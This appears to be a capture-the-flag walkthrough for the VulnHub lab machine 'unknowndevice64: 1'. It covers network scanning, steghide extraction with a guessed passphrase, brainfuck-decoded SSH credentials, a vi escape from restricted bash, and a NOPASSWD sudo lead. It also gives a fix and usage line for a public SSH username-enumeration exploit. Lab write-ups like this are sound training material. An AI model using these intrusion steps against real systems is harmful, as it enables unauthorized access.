[unknowndevice64: 1] Download: https://www.vulnhub.com/entry/unknowndevice64-1,293/
Target: gain root on the machine and read /root/flag.txt
1. Import the image into VMware locally (NAT mode; the image has DHCP enabled by default, and Kali is on the same subnet, 192.168.80.0/24).
2. Scan the subnet to find the target's IP.
root@kali:/home/ud64# nmap -sn 192.168.80.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 01:43 EDT
Nmap scan report for 192.168.80.1
Host is up (0.00042s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.134
Host is up (0.0011s latency).
MAC Address: 00:0C:29:D4:9F:79 (VMware)
Nmap scan report for 192.168.80.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:EA:7D:F3 (VMware)
Nmap scan report for 192.168.80.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.97 seconds
3. Scan the target with nmap to list its open ports.
root@kali:/home/ud64# nmap -p- -sS -sV 192.168.80.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 00:00 EDT
Nmap scan report for 192.168.80.134
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.7 (protocol 2.0)
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 00:0C:29:D4:9F:79 (VMware)
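The scan shows the target's SSH service on port 1337 and an HTTP server on port 31337.
4. Open 192.168.80.134:31337 in a browser and view the page source with the developer tools.
The source references the file key_is_h1dd3n.jpg, hinting that the key is hidden in this JPG image.
Download the image to Kali: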
wget http://192.168.80.134:31337/key_is_h1dd3n.jpg
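5. Use Steghide to try to extract the information hidden in the image. Details about Steghide are easy to find with a web search.
root@kali:/home/ud64# apt-get install steghide # not bundled with Kali, so install steghide
root@kali:/home/ud64# steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n # extraction needs the passphrase that was used when embedding; guessed from the image name, and luckily h1dd3n is the passphrase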
wrote extracted data to "h1dd3n.txt".
root@kali:/home/ud64# cat h1dd3n.txt # view the extracted file
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.
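6. The file content is a program written in the brainfuck language. It can be run with the online tool at https://copy.sh/brainfuck/, and the output gives the SSH username and password.
7. Log in to the target: ssh ****@192.168.80.134 -p 1337
(The login username is hidden to avoid spoilers.)
8. After logging in, the user turns out not to be root, so privilege escalation is needed.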
ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found
9. Press Tab twice to list the commands the current user can run.
ud64@unknowndevice64_v1:~$
! ]] builtin compgen date done esac false function id let mc read set test true unalias while
./ alias caller complete declare echo eval fc getopts if local popd readarray shift then type unset whoami
: bg case compopt dirs elif exec fg hash in logout printf readonly shopt time typeset until {
[ bind cd continue disown else exit fi help jobs ls pushd return source times ulimit vi }
[[ break command coproc do enable export for history kill mapfile pwd select suspend trap umask wait
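vi is available, and vi can be used to break out of the restricted shell.
sh-4.4$ export PATH=/bin:/usr/bin:$PATH # update the PATH environment variable
sh-4.4$ cat flagRoot.txt # the flag file can already be read at this step
sh-4.4$ sudo -l # something interesting shows up here: /usr/bin/sysud64 can be used to run any command with root privileges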
User ud64 may run the following commands on unknowndevice64_v1:
(ALL) NOPASSWD: /usr/bin/sysud64
Tools used:
nmap
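steghide: open-source steganography program
brainfuck: programming language
SSH username enumeration (https://www.exploit-db.com/exploits/45939): line 35 of the code needs to be changed to sock.connect((args.target, int(args.port)))
Usage: python ssh_enum_user.py -p 1337 192.168.80.134 root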